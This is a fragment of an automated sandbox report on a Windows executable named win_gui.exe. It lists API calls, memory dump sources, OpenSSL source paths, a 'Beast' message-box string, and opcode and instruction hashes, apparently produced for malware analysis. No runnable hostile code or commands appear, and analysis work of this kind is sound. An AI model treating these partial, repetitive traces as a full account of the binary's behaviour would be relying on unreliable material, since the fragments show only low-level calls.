                                    • Part of subcall function 006750C5: IsProcessorFeaturePresent.KERNEL32(00000017,006750B4,00000016,006749B2,0000002C,006CB098,0066CD7A,?,?,?,006750C1,00000000,00000000,00000000,00000000,00000000), ref: 006750C7
                                    • Part of subcall function 006750C5: GetCurrentProcess.KERNEL32(C0000417,006749B2,00000016,00674E1F,?,?,?), ref: 006750E9
                                    • Part of subcall function 006750C5: TerminateProcess.KERNEL32(00000000,?,?,?), ref: 006750F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066E1AB
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066E1C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: -f$-f
                                  • API String ID: 885266447-3269902443
                                  • Opcode ID: c4207259eb98b871702eab5af2aab2ea082859d3179b599ffc0d4b4b3ce9f4d2
                                  • Instruction ID: 73580ae21dead2e3bddedbf50d804f8d93a5004c812de67849a7b296a3d21905
                                  • Opcode Fuzzy Hash: c4207259eb98b871702eab5af2aab2ea082859d3179b599ffc0d4b4b3ce9f4d2
                                  • Instruction Fuzzy Hash: FB516C75E00248AFCF18DF58C884AAEBBB3EF99324F19C159E81897361D7729D51DB80
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\win_gui.exe.exe,00000104), ref: 00668693
                                  • _free.LIBCMT ref: 0066875E
                                  • _free.LIBCMT ref: 00668768
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\Desktop\win_gui.exe.exe
                                  • API String ID: 2506810119-2541543497
                                  • Opcode ID: 179922cb134205e71fa1d48560cfb08c9d8fb0610d41329556422ae0552c13ff
                                  • Instruction ID: 337d0e167f166d0980451defba9277e0f2f6d5b4b17d728d98174daca87b7977
                                  • Opcode Fuzzy Hash: 179922cb134205e71fa1d48560cfb08c9d8fb0610d41329556422ae0552c13ff
                                  • Instruction Fuzzy Hash: 46317C71A05218AFCB21DFA9CC859AEBBBEEB85310B2041ABF404D7311DE709E41CB94
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6,006D8978), ref: 00660757
                                  • GetConsoleMode.KERNEL32(00000000), ref: 0066075E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ConsoleHandleMode
                                  • String ID: conin$$conout$
                                  • API String ID: 674689721-2896197411
                                  • Opcode ID: 4ee98d9c085bca46a9d51a8ba3230f022f3ca746f3c3c2742451cc8139a89a89
                                  • Instruction ID: f6c8efaa3a85eea1eaa35390f2284608c7bce066b65c96bb422abb430c795d45
                                  • Opcode Fuzzy Hash: 4ee98d9c085bca46a9d51a8ba3230f022f3ca746f3c3c2742451cc8139a89a89
                                  • Instruction Fuzzy Hash: D8F081B0E422026AEB406BA8AC1AB767B67AB20705F05013BE0459A2A1FA71D5009B57
                                  APIs
                                  • lstrlenA.KERNEL32 ref: 005C1021
                                  • lstrlenA.KERNEL32 ref: 005C102F
                                  • lstrlenA.KERNEL32 ref: 005C105A
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,00000001), ref: 005C1086
                                  • lstrlenA.KERNEL32 ref: 005C1097
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 477651035-0
                                  • Opcode ID: 70a1c970dc7b7f178be0195d469cc6e69be8fbcc0d23deb6c19032cb8f5725ad
                                  • Instruction ID: b2809fb8c2f98896ce9fbe251b7ecb0b4689ff21e71b8ec8d874e28001ee14e7
                                  • Opcode Fuzzy Hash: 70a1c970dc7b7f178be0195d469cc6e69be8fbcc0d23deb6c19032cb8f5725ad
                                  • Instruction Fuzzy Hash: 1021B071A00616EFDB10DF94CC94FAEB7B9FF86360F1101A9D411A7241EB70AE02CB54
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  • API String ID: 1036877536-0
                                  • Opcode ID: 8006946c75c6fcf1c7f255cce8a48f3be255b242e49acd5b7eb7736965583298
                                  • Instruction ID: 2b3c39222c981480969bbb95d53d0e9fa0bb015aa822b30e1bc91209eec0da21
                                  • Opcode Fuzzy Hash: 8006946c75c6fcf1c7f255cce8a48f3be255b242e49acd5b7eb7736965583298
                                  • Instruction Fuzzy Hash: 73A157329803869FE7158F28C8957FEBBE6EF51310F2885ADE58D9B342CA348D41C756
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: b777423b2eb27fb0ceb68c0af0e219a7b5aaf1b04ab25ea5ea8a210cfcd8cb8d
                                  • Instruction ID: fce7d8145fe023a0a5dbbc2046fbaff911a98374abbf4f58b8528a3f44a2691e
                                  • Opcode Fuzzy Hash: b777423b2eb27fb0ceb68c0af0e219a7b5aaf1b04ab25ea5ea8a210cfcd8cb8d
                                  • Instruction Fuzzy Hash: 07414E31A001006BDB216BB88C45AEE3BA7FF49770F24C6DDF41DD7291E6764C4946A5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fdf3f6c2d434f9f9b34ee1aa31af94de4e24b028ac7d0c2c6f92aa8fad186d3
                                  • Instruction ID: 0177e3528f326f0547f20a3b27d1c8c58b8490fd274fd10ec1805c0955e70b4e
                                  • Opcode Fuzzy Hash: 7fdf3f6c2d434f9f9b34ee1aa31af94de4e24b028ac7d0c2c6f92aa8fad186d3
                                  • Instruction Fuzzy Hash: 1E41EEB1A00704BFE724AF78CC45B9A7BEAEB45710F20C66EF155DB381DB7199418B84
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000004,00000000,00000000,?,?,?,?,00000001,00000004,?,00000001,?), ref: 00677507
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00677590
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000004,?), ref: 006775A2
                                  • __freea.LIBCMT ref: 006775AB
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  • Opcode ID: 26c90e346a3fe1680504eacb7f6c5323d37a800d357a7e958f395baff5ef6755
                                  • Instruction ID: f3ca86c99247da9cee3ea750e42c75e7c6f6fc69cdacacaa845d94824a5f1550
                                  • Opcode Fuzzy Hash: 26c90e346a3fe1680504eacb7f6c5323d37a800d357a7e958f395baff5ef6755
                                  • Instruction Fuzzy Hash: 5131C172A1420AAFEF249F64DC45DEE7BAAEF40310F158229FC08D6250EB35CD55CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed664af913e2d03de16605eba29ad3fd53de8a6bc9532ce4acb8797e83a14ae
                                  • Instruction ID: 8a0c6817791c92549325f355d9e50b1b0d6a4cbe46f7365ee5348eabde06bb28
                                  • Opcode Fuzzy Hash: fed664af913e2d03de16605eba29ad3fd53de8a6bc9532ce4acb8797e83a14ae
                                  • Instruction Fuzzy Hash: D401F2F220960A3EE76016786CC5FA7631FDF813B8B31072AB535622D4DEA08C014264
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue), ref: 006763E0
                                  • GetLastError.KERNEL32(?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue,006C64EC,FlsSetValue,00000000,00000364,?,00674E6E), ref: 006763EC
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue,006C64EC,FlsSetValue,00000000), ref: 006763FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 8f86619cd015957251f126037621b57fd11cd5f41043c3f9a7346517eb0f6e39
                                  • Instruction ID: e5e22c4c6fc0240319811641677b22de56eff8a88178ab332f4c7bf7cfe9de6f
                                  • Opcode Fuzzy Hash: 8f86619cd015957251f126037621b57fd11cd5f41043c3f9a7346517eb0f6e39
                                  • Instruction Fuzzy Hash: 9001D832615732ABCB318B68DC449963BDEAF157A1B20D720F90AD7280D720D802C7D0
                                  APIs
                                    • Part of subcall function 005C712C: EnterCriticalSection.KERNEL32(006D9A1C,00000001,00000000,005C8CEC,00000001,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7131
                                    • Part of subcall function 005C712C: LeaveCriticalSection.KERNEL32(006D9A1C,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7169
                                  • DeleteCriticalSection.KERNEL32(006D9A1C,?,75A8B390,005C5BDB), ref: 005C8C4C
                                  • DeleteCriticalSection.KERNEL32(006D9874), ref: 005C8C5B
                                  • DeleteCriticalSection.KERNEL32(006D99FC), ref: 005C8C6A
                                  • DeleteCriticalSection.KERNEL32(006D9898), ref: 005C8C8F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Delete$EnterLeave
                                  • String ID:
                                  • API String ID: 3104255891-0
                                  • Opcode ID: 0298b79626a7fc127998fa27a9bb3c858f35a15b2254a65969369dd8a19595fa
                                  • Instruction ID: 4d60880022e7c11d13695bb4c493691aea4ec9c67faf9d63f46f0856fa11b850
                                  • Opcode Fuzzy Hash: 0298b79626a7fc127998fa27a9bb3c858f35a15b2254a65969369dd8a19595fa
                                  • Instruction Fuzzy Hash: 29E01201F104661B47053AF82C59E7E0D5F9DCB71030D012FB202B73538D980C426AF6
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _strncpy
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509\x509_obj.c$NO X509_NAME
                                  • API String ID: 2961919466-2144397184
                                  • Opcode ID: 6b077ced116aacbea8734848f99890beb0d2691326c6652170de8b09da489eaa
                                  • Instruction ID: dd9e96fb875c1fa6235fbc6c143bdbc3410f8aa6881e6e71eeff8f7c5aa6279b
                                  • Opcode Fuzzy Hash: 6b077ced116aacbea8734848f99890beb0d2691326c6652170de8b09da489eaa
                                  • Instruction Fuzzy Hash: DCA1D1716083459FD720DF58C886B6ABBE6BF86308F18446DF8898F342E775D9058B92
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 960044991246124babdcc123e8cefd963715f58865b8e388fd9866d6556f0bc2
                                  • Instruction ID: d5e328e12c9cf6991add39faa58d23f07259d0b25d674138125df21302768cd6
                                  • Opcode Fuzzy Hash: 960044991246124babdcc123e8cefd963715f58865b8e388fd9866d6556f0bc2
                                  • Instruction Fuzzy Hash: 0791E431D04149EBCF20DF68E8506EDBBB3EF56360F24867AE865A7381D6319D42CB61
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0065529A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509v3\v3_info.c$value=
                                  • API String ID: 601868998-1818281595
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,005F012B,005F012A,00000000,00000000,00000000,00000000,?,74E84AB0,00000000,005F012B,00000000), ref: 005F2324
                                  Strings
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                  • API String ID: 626452242-3997076816
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00642EA1
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00642EE9
                                  Strings
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509v3\v3_utl.c
                                  • API String ID: 601868998-3037191162
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: __vfprintf_l
                                  • String ID: %*s<Not Supported>$%*s<Parse Error>
                                  • API String ID: 86772892-2906783721
                                  APIs
                                  • __fread_nolock.LIBCMT ref: 005EC12E
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,0000009A), ref: 005EC14E
                                  Strings
                                  Similarity
                                  • API ID: ErrorLast__fread_nolock
                                  • String ID: ..\..\openssl-1.1.0f\crypto\bio\bss_file.c
                                  • API String ID: 3734711595-2465601336
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • wvsprintfW.USER32(00000000,?,?), ref: 005CC38B
                                  • MessageBoxW.USER32(00000000,Beast,?), ref: 005CC3AA
                                  Strings
                                  Similarity
                                  • API ID: AllocateHeapMessagewvsprintf
                                  • String ID: Beast
                                  • API String ID: 584556068-4068918530
                                  APIs
                                  • GetOEMCP.KERNEL32(00000000,?,?,00675A33,?), ref: 006757D5
                                  • GetACP.KERNEL32(00000000,?,?,00675A33,?), ref: 006757EC
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: 3Zg
                                  • API String ID: 0-1257161726